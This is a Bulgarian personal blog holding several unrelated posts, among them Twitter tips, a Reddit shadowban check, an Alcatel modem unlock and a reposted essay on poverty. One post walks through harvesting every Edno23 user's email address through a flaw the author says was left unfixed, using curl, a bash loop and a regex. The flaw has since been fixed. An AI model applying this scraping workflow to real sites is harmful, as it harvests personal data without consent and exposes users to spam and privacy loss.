HTTP debugger

Понякога човек се нуждае от услуги който надежно да използва докато праща заявки нагоре-надолу към други услуги. Разбира се… не винаги може да се дебъгне точно какво и как се изпраща нагоре, особенно когато заявките са криптирани.

И тук на помощ идва HTTPBIN. Със негова помощ може доста по-лесно да се диагностицират заявките и да се преработят.

Последният войнишки император

Тъй като напоследък не съм се разписал, но непрекъснато чета това и онова е време да започна да ги складирам нейде. И времето дойде.

Последният войнишки император – част 1
Последният войнишки император – част 2
Последният войнишки император – част 3

Общо взето се чете на един дъх и е много завладяващо. Няма да ви развалям удоволствието със разкрития какво се случва. Само става въпрос за иманяри и императори.

Hacking Edno23 with opensource tools

Хакване на Edno23

Важно 2: Във curl командите за вход е отстранена малка грешка.

Важно 1: По-малко от час след написването на настоящето проблема беше отстранен. Благодарим на администрацията за бързата реакция.

Лятото на 2014 забелязах, че във мобилната версия на Edno23 има особенност която позволява да се види мейла на кой-да-е потребител във системата. Алармирах администрацията на сайта които ми отговориха, че това било от темата и били знаели за него. Изчаках търпеливо няколко (9) месеца, но проблема си стоеше неотстранен. И една вечер ми хрумна да им смъкна всичките мейли на регистираните им потребители. Сега ще ви покажа как беше реализирано всичко това за 5 минути.

Първата задачка беше да се смъкнат списъците на всички налични потребители. Списъка на всички потребители се намира тук:
http://edno23.eu/members
но има и 2,3 и общо 713 страници:
http://edno23.eu/members/tab:all/pg:2
http://edno23.eu/members/tab:all/pg:3
http://edno23.eu/members/tab:all/pg:4

http://edno23.eu/members/tab:all/pg:713

Това се изпълнява много лесно само със един ред:

curl http://edno23.eu/members/tab:all/pg:[1-713] -o "profiles-pg#1.txt"

При това не е необходимо човек да бъде логнат във сайта за да достъпи този списък. След операцията във папката ще има сумарно 713 текстови файлове със съдържанието на потребителите. Във всеки един от текстовите файлове има до 24 потребителя. След бърз преглед установяваме как линковете към потребителите имат добавен клас groupname или groupavatar. За наша радост egrep има удобна фукнция за филтриране на файлове на базата на regex шаблон:

egrep -h -o "http://edno23.eu/.*\" class=\"groupname\"" profiles-pg*.txt

разбира се извеждането във конзолата е леко досадно затова си го пренасочваме към файл ето така:

egrep -h -o "http://edno23.eu/.*\" class=\"groupname\"" profiles-pg*.txt > full-list-users

след което трябва да отворим файла full-list-users и да премахнем ето това
” class=”groupname”
от всички редове и честито. Току-що получихме списък на линковете към профилите на всички потребители на сайта.

Втората задачка беше да вземем самите мейли от всеки един потребител. Тук вече късмета малко ми поизневери. Трябваше да намеря начин да вляза във сайта за да мога да смъкна информацията. За моя радост curl имаха решение и на този проблем:

curl -o login.txt -b ./my_cookies.txt -c ./my_cookies.txt -A "Mozilla/5.0 (iPhone; CPU iPhone OS 7_0_4 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11B554a Safari/9537.53" http://edno23.eu/m/

така правим посещение на логин формата. Сега ще въведем потребителското име и паролата:

curl --data "email=EMAIL&password=PASSWORD&rememberme=1" -o login.txt -b ./my_cookies.txt -c ./my_cookies.txt -A "Mozilla/5.0 (iPhone; CPU iPhone OS 7_0_4 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11B554a Safari/9537.53" http://edno23.eu/m/

Съдържаниято на login.txt трябва след горната операция трябва да има линк към:

http://edno23.eu/m/dashboard

Което е сигурен сигнал, че сме влезли напълно редовно и можем да започнем със събирането на информацията ни. Нека сега да направим и автоматизация смъкването на информацията:

#!/bin/bash
echo enter file name
read fname
exec<$fname
while read line
do
AFTER_SLASH=${line##*/}
echo $AFTER_SLASH
url="http://edno23.eu/m/${AFTER_SLASH%%\?*}/show:info"
curl -o $AFTER_SLASH.txt -b ./my_cookies.txt -c ./my_cookies.txt -A "Mozilla/5.0 (iPhone; CPU iPhone OS 7_0_4 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11B554a Safari/9537.53" $url
done

Горния bash скрипт се записва като dump_users.sh. Дават му се права за изпълнение (chmod +x dump_users.sh) и си го изпълняваме. Скрипта ще помоли за име на входния файл със потребителите при което му подаваме файла full-list-users като вход и започва голямото смъкване. Ако цялата операция премине успешно ще имаме папка със около 17000 файла със шаблона username.txt. Това ще трае може би няколко часа във зависимост от интернет достъпа ви, затова се въоръжете със малко търпение.

Третата задачка беше най-сладката… да съберем мейлите от вече смъкнатите профили:

egrep -h -o "\b[a-zA-Z0-9.-]+@[a-zA-Z0-9.-]+\.[a-zA-Z0-9.-]+\b" *.txt

тук обаче се натъкваме на нов проблем. Някой от файловете имат мейла два пъти което лесно се фиксира със един sort -u:

egrep -h -o "\b[a-zA-Z0-9.-]+@[a-zA-Z0-9.-]+\.[a-zA-Z0-9.-]+\b" *.txt | sort -u

Както сами виждате няма нищо сложно във горните команди. На практика не са нищо повече от извикване на curl, egrep и bash със няколко параметъра, което е доста добре за потребителите на *nix и клонинзите. Ако работите под Windows навярно ще трябва да използвате bash от Cygwin или със лека преработка PowerShell. Разбира се аз няма да ви дам на готово списък със мейлите на потребителите. И най-забавното във целия случай е че според правилата на сайта описани тук http://edno23.eu/terms всичко си е напълно коректно:

Запазваме правото си да деактивираме или изтриваме профили, направени изцяло с рекламна цел. Извиняваме се, но никой не ги иска на този етап, включително и ние.

Съвети и трикове за използването на Twitter

Това навярно ще е единственното ръководство за Twitter от което изобщо ще се нуждаете! Twitter е световния лидер във средствата за мигновенна масова комуникация. Определено е най-бързия канал позволяващ на бизнеса да комуникира със клиентите и става все повече популярен като канал за поддръжка на потребителите (Customer Service) където съобщенията може да бъдат обяснени във 140 или по-малко символа. Обаче Twitter е много повече от комуникационна платформа! Тя позволява да се доближите и да комуникирате до лидерите във Вашата индустрия, да научите повече относно конкурентите във Вашата ниша и да видите как е тяхното присъствие във световната мрежа, да се утвърдите като истински авторитет във Вашата област. Във настоящата статия ще ви покажем най-добрите техники за използване на Twitter.twitter-tricks-and-tips

Twitter съвети и трикове:

  1. Бъдете интересни
    Ако сте отегчителни, ще изгубвате последователи. Изкарайте на яве Вашата персоналност! Публикувайте необичайни линкове относно Вашата ниша, подходящи истории, цитати и интересни мисли. Накарайте последователите ви да се забавляват, насърчавайте ангажиранноста (engagement) им и разговорите им. Така вие ще се отличите от тълпата.
  2. Бъдете социални
    Не публикувайте само Ваше съдържание. Има твърде много потребители които публикуват само съдържание относно техните мисли, блог постове, събития и съдържание относно тях. Всичко във социалната мрежа се върти относно социализацията, затова разпространявайте съдържанието на другите особенно на по-известните. Това ще ви позволи да бъдете забелязани от тях и от други потребители.
  3. Следвайте лидерите
    Преди да разпространите тяхното съдържание последвайте лидерите. Следвайте потребители които са вече активни във вашата ниша. Това ще ви позволи да научите повече относно Вашите потребители и какви са водещите тенденции във Вашата индустрия. Тогава вие ще можете да изпращате @ споделяния за да грабнете тяхното внимание и да подобрите Вашето представяне.
  4. Следвайте конкурентите
    Twitter е приятелска мрежа където е често срещано конкурентите да се следват един друг (примерно Дневник следва Сега). Не бъдете срамежливи и последвайте Вашите директни конкуренти, бивши партньори.
  5. Обичайте хаштаговете
    Използвайте хаштаговете да се присъедините към водещите разговори и да бъде Вашия бизнес във течение на тях. Гледайте какво останалите Twitter потребители използвате като хаштагове във областта ви и често ги търсете за да видите какво е популярно и какво вече е непопулярно.
  6. Използвайте списъците
    Много хора знаят за списъците във Twitter, но за съжаление потребителите рядко използват тази безценна възможност. Създаването на потребителски списъци позволява лесно да насочите към групите специфични съобщения или техники към тях. Например можете да направите списъци със хората които често Ви цитират (retweet), така Вие можете да предположите, че всичко което публикувате към този списък от потребители ще бъде цитирано. Или ако Ваш продукт може да заинтересува няколко групи различни потребители (например “shared хостинг”, “vps хостинг” и “cloud хостинг”)  Вие можете да категоризирате последователите Ви във различни списъци и да им изпращате специфични линкове и съдържание към тях.
  7. Подробно търсене
    Също както списъците това е недооценен инструмент. Подробното търсене (advanced search) позволява да направите търсене за потребители или клиенти отговарящи на зададени критерии – хештагове, думи, фрази, локация (ако целите някакво местно ниво) и дори повече.
  8. Всемогъщите “Други”
    Ако влезете във подробното търсене, ще забележите поле именовано “Други” (other). Това малко поле е същинска златна мина! То позволява да следите за Вашата конкуренция и да видите където те не отговарят на въпросите напотребителите. Когато търсите относно конкуренцията изберете полето “Въпрос?” (question?) за да видите ако потребители изпращат въпроси на конкуренти и остават без отговори. Тогава можете да отговорите директно на въпросите им от Ваше име.
  9. Мислете за мобилността
    Основна част от от потребителите използват социалната мрежа през своите мобилни устройства. Затова когато пускате връзки към сайтове имайте едно наум къде можете да ги изпратите и дали тези сайтове са съвместими със мобилните устройства.
  10. Публикувайте изображения
    Twitter потребителите обожават изображенията (и изображенията обожават мобилните потребители). Намерете оптимален баланс между съобщения със текст, съобщения със картина и съобщения със текст и картина.
  11. Следете любимите
    Не всеки ще сподели вашите съобщения. Повечето потребители ще ги маркират като “Любими” (favorite) вместо това. Всъщност това не е никак зле! Обикновенно означава, че те ще запазят вашата информация и ще я прочетат/споделят на по-късен етап или просто я харесват. Проследяването на подобни потребители може да се окаже ценна придобивка във Вашите маркетингови усилия. Вие можете да намерите какво потребителите правят, за какво пишат, какви са техните последователи и т.н. Тогава Вие можете да направите маркетингова кампания специално за тях и техните последователи. Отделете ги във отделни списъци базирани на съобщенията които те маркират като любими.
  12. Автоматизирайте
    Използвайте социални инструменти за да автоматизирате времеотнемащите и трудоемки дейности във социалните мрежи. Ще бъде обект на отделна статия по въпроса. Като за начало можете да използвате HootSuite, Buffer за целта. Във последствие ще откриете Followerwonk, TwitterCounter, Klout, Twitonomy и други.
  13. Не пускайте съобщения и бягайте
    Пускането съобщенията е супер, но никога не оставяйте съобщенията към вас без отговори. Това че сте автоматизирали нещо не означава, че трябва да отсъствате от останалата част от комуникацията. Отговарянето на съобщенията и споделянето им е ключово за изграждането на авторство, доверие и взаимоотношение със остананалите потребители или клиенти.
  14. Намерете Вашето време
    Използвайте инструменти като Followerwonk за да определите най-доброто време за публикуване на съобщения. Ако публикувайте съобщенията във неподходящ час цялата тази дейност ще бъде безмислена, защото няма да има кой да го прочете.
  15. Променяйте мястото на връзките
    Не поставяйте винаги връзките на края на Вашите съобщения. Понякога поставянето на връзката по средата или дори във началото на съобщението може да Ви помогне да получите дори по-добра обратна връзка от потребителите. Намерете оптималната среда за линка като направите тестове сред Вашата аудитория.
  16. Не забравяйте Вашия профил
    Създайте фонова снимка на Вашия профил. Всички знаят за възможносттите за избиране на цветова гама и фонове във Twitter профила, но рядко използват предимството да се откроят от тълпата на потребителите със специфична снимка за фон. Повечето хора просто поставят профилна снимка и евентуално фонова профилна снимка. Фоновата снимка на Вашия профил може да бъде допълнена със Ваша снимка, лого, биографични данни, телефон, сайтове и други. Това е голяма възможност която не бива да бъде изпускана.

Мислите, че има трик който сме пропуснали? Не се колебайте да го споделите по-долу във секцията за коментари.

Reddit shadowban

Reddit е широко разпространена социална мрежа и продължава да расте. За съжаление апетита идва със яденето и спамърите идват със потребителите. Във reddit имат голям опит със борбата им и са изобретили един много хитър начин за преборването им – shadowban. Когато потребител е маркиран като спамър видимо всичко продължава както по старо му за него. Проблема е, че никой не му вижда коментарите, вотовете и публикуваните истории. Разбира се има модератори във различните раздели които могат да ви разрешат индивидуално достъпа до техните раздели. Обаче става досадно да се молиш на различните модератори за достъп. Много по-добре е да се свържеш директно със администраторите на сайта за да бъде решен проблема със акаунта отколкото да се разрешава достъпа до разделите. Сега ще ви покажа как може да се провери това. Преди известно време установих, че акаунта ми има проблем – публикувах неща, но не можеха да се видят от не логнат потребител. За мое съжаление не разбирах, че съм бил изключен от системата. Писах на модераторите във единия раздел и там ми вдигнаха забраната, но във втория раздел ми казаха че имам проблем със самия акаунт и имам shadowban забрана. Сега ще ви покажа когато акаунта има такава забрана какво се вижда:

curl -I http://www.reddit.com/user/peternikolow
HTTP/1.1 404 Not Found
Content-Type: text/html; charset=UTF-8
x-frame-options: SAMEORIGIN
x-content-type-options: nosniff
x-xss-protection: 1; mode=block
Server: ‘; DROP TABLE servertypes; —
Date: Thu, 23 Jan 2014 12:50:56 GMT
Connection: keep-alive
Vary: accept-encoding

Когато потребителя няма shadowban то горното изглежда ето така:

curl -I http://www.reddit.com/user/peternikolow
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Last-Modified: Thu, 23 Jan 2014 20:57:00 GMT
x-frame-options: SAMEORIGIN
x-content-type-options: nosniff
x-xss-protection: 1; mode=block
Server: ‘; DROP TABLE servertypes; —
Cache-Control: private, must-revalidate, max-age=0
Date: Thu, 23 Jan 2014 23:47:36 GMT
Connection: keep-alive
Vary: accept-encoding

След като се установи със сигурност, че акаунта е маркиран пътя към пречистването минава оттук /r/reddit.com и съобщение към администраторите със молба да бъдете отписан от позорния списък. Разбира се не е задължително молбата да ви бъде удовлетворена, всичко зависи от прегрешенията ви. Затова е хубаво да се спазва редикета / reddiquette и правилата на сайта. Специално за оплаквания и мрънкания има отделна секция /r/ShadowBan/ където и блокирани потребители могат да пишат без проблем. Секцията /r/reportthespammers е специално запазена за оплаквания от спамъри.В тази секция модераторите гласуват и потребителя получава shadowban.

Unlock Alcatel OneTouch X220L or S220L or X220S

alcatel-onetouch-x220s-x220l-s220l

Сега ще ви покажа как да си отключите Alcatel OneTouch X220L или S220L бързо и лесно.

В моя случай използвам такъв 3G модем от Vivacom който е (т.е. беше) заключен към Vivacom, но ми се наложи да го използвам с карта на другите 2 оператора. Устройството изглежда като това от дясно с тази разлика че моето беше черно. На пазара се среща под три имена – X220L (като при мен), S220L или дори в собствената им документация и като X220S. Нямам никаква идея защо едно и също устройство се предлага в толкова много разновидности и под толкова много имена. Според мен всичките са еднакви и няма никаква разлика между тях.

Решението е много лесно:

1. Намирате IMEI на устройството – намира се на кутията му ИЛИ когато се отвори е написано на едно листче от вътрешната страна

2. Отивате тук – http://www.nextgenserver.com/calculator/

3. Избирате Alcatel Modem, после отдолу S220L, записвате IMEI номера отгоре, попълвате captcha-та и натискате бутона Order.

4. Номерата се генерират на момента. За всеки случай си ги запазете в един файл.

5. Слагате каква-да-е карта на друг оператор. Приложението ще ви поиска NCK кода. Подаваме го et voila! устройството вече работи с картите на 3-те оператора в България и навярно с оператори от целия свят.

Мизерията

Да напоследък виждам некви страшни неща по телевизиите от различни точки на България. Покрай наводненото село Бисер видях хора който живеят ама много, много зле. Също умственото ниво на тия хора ме уплаши доста. Говореха и изглеждаха на много примитивно ниво. Облечени едни такива в каквото намерили.(не говоря само за пострадалите в село Бисер). Странни погледи имаха. Едни изцъклени такива. Военните които бяха там изглеждаха също някак окаяно и дрипаво. Представителите на властта като президент, министри също изглеждаха наугледно и бедно. Видях да раздават пликове с пари в една грозна, порутена стаичка в някаква грохнала постройка, която би трябвало да изглежда представително. Пликовете бяха наредени на една маса и в тази мрачна стаичка дори парите изглеждаха бедно. На друго подобно място бяха струпали стари чували от ония найлоновите най-грубите, дето едно време на село дядо ми събираше царевица, пълни с дрехи за пострадалите. Две отрудени лелки с торби под очите стояха сред тия камари чували и даваха отчет. Видях две жени в една болница които бяха родили в деня на трагедията и това трябваше да е хепи репортаж. Само дето едната беше на 15 години, а другата имаше някакви умствени отклонения. Обстановката вътре също беше подтискаща. Две акушерки стояха и едната седържеше някак странно. Един мъж от друго село (ненаводнено) изродил сам детето си и говореше как има опит понеже израждал телетата на кравите. Жена му ми се стори умствено изостанала, също и той. Тя лежеше на кушетка от ония дето са по казармите, старите съветските ако се сещате и в стаята нямаше почти нищо. Много плачещи хора видях по телевизията. Всеки плачеше за нещо. Една жена плачеше, че килимите и дрехите и са мокри. Възрастен мъж плачеше че е стоял на покрива на къщата си и е чакал водата да спадне. Друг плачеше, че е видял двама човека да викат за помощ и водата ги е отнесла. Една баба плачеше, че дрехите които носи са чужди. Разни хора висят по влакове часове наред и чакат да тръгне oбаче той не тръгва. Прибират се късно вечер след мръзнене и чакане по гарите от работа в родния си град и тихо плачат в стаите си. Други стоят без ток и чакат да дойде. Някои хора все още ходят с коли из гората да събират дърва за огрев и закъсват в снега и не могат да продължат. Едни астрономи в база спели в най-големия студ без отопление и разправяха как се издържа ама на сутринта като се събудели вече им било наистина зле. Деца умират в държавна болница докато чакат за трансплантации. Рушат се здания и само чист късмет е че не взимат жертви. Умират хора докато чакат Бърза помощ. Зачестяват случаите на самоубииства. Най-ме потресе случай с една баба която се самоубила. Винаги съм си представял, че стар човек не би се самоубил. Някак ми се струваше неестествено. Доколкото изобщо е естествено да се самоубие човек. Отвсякъде лъха на мизерия. Това не е заради тежката зима и студ които връхлетяха България. Не само при нас температурите са минусови и има много сняг. Нещо друго е. Някаква мъка се е настанила в нашата държава. Нещо тягостно и подтискащо. Един призрак броди из България, ама не е на комунизма както пише в Комунистическия манифест, а на мизерията. Истинска, всепоглъщаща, задушаваща мизерия.

Текста не е мой! Но всичко което описват е реално и мен ме плаши също.